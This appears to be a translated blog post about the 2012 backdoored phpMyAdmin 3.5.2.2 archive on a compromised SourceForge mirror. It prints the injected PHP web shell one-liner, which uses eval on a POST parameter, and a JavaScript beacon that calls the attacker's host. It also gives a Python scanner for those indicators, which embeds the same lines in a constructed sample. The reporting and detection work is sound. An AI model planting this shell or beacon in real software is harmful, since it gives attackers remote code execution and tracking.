
phpMyAdmin backdoor

On September 25 it became known that one of SourceForge's Korean mirrors (cdnetworks-kr-1) had been compromised.

A backdoor had been introduced into the archive phpMyAdmin-3.5.2.2-all-languages.zip hosted on that mirror.

A file server_sync.php had been added to the archive, containing the code:

<?php @eval($_POST['c']);?>

which allows arbitrary PHP code supplied in a POST parameter to be executed.
The file js/cross_framing_protection.js was also modified; the following code was added to it:

var icon ; icon = document.createElement("img"); icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg"; icon.width=0; icon.height=0; document.body.appendChild(icon);

which loads a zero-size image from the attacker's host, letting the attacker learn where infected copies are deployed.
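As an added example (not code from the original post or from the phpMyAdmin project), a small Python scanner that checks a downloaded phpMyAdmin zip for the two indicators described above: the added server_sync.php with its eval() of a request parameter, and the beacon host injected into js/cross_framing_protection.js. The sample archive it builds is constructed for the self-test and is not the real release; the function names are my own.

```python
import io
import re
import sys
import zipfile

# Indicators from the report: the dropped file, the eval($_POST[...]) one-liner
# it contains, and the host contacted by the injected image beacon.
SUSPECT_FILE = "server_sync.php"
EVAL_REQUEST_RE = re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST)\s*\[")
BEACON_HOST = b"logos.phpmyadmin-images.net"


def scan_archive(data: bytes) -> list:
    """Return (member, reason) findings for a phpMyAdmin zip held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lower = name.lower()
            if name.split("/")[-1] == SUSPECT_FILE:
                findings.append((name, "unexpected file server_sync.php"))
            if not lower.endswith((".php", ".js")):
                continue
            content = zf.read(info)
            if lower.endswith(".php") and EVAL_REQUEST_RE.search(content):
                findings.append((name, "eval() of request parameter"))
            if BEACON_HOST in content:
                findings.append((name, "beacon to logos.phpmyadmin-images.net"))
    return findings


def build_sample(infected: bool) -> bytes:
    """Constructed sample archive (not the real release) for a self-test."""
    base = "phpMyAdmin-3.5.2.2-all-languages/"
    js = "function cross_framing_protection(){if(self!=top){top.location=self.location;}}\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(base + "index.php", "<?php echo 'ok'; ?>")
        if infected:
            zf.writestr(base + SUSPECT_FILE, "<?php @eval($_POST['c']);?>")
            js += 'var icon=document.createElement("img");icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";\n'
        zf.writestr(base + "js/cross_framing_protection.js", js)
    return buf.getvalue()


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample(True)
    for member, reason in scan_archive(data) or [("-", "no indicators found")]:
        print(f"{reason}: {member}")
```

Run it with the path of a downloaded archive as the only argument; with no argument it scans its own constructed infected sample.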

For now the compromised mirror has been removed from rotation.

The SourceForge team determined from its logs that roughly 400 people downloaded the file. Everyone who downloaded it and could be identified was sent a warning by email.

An exploit for this backdoor has already been added to the Metasploit framework.

Sources:
Corrupted copy of phpMyAdmin on Korean mirror server
PMASA-2012-5
Compromised SourceForge mirror
Add exploit for phpMyAdmin backdoor

Source: https://habr.com/ru/post/152433/
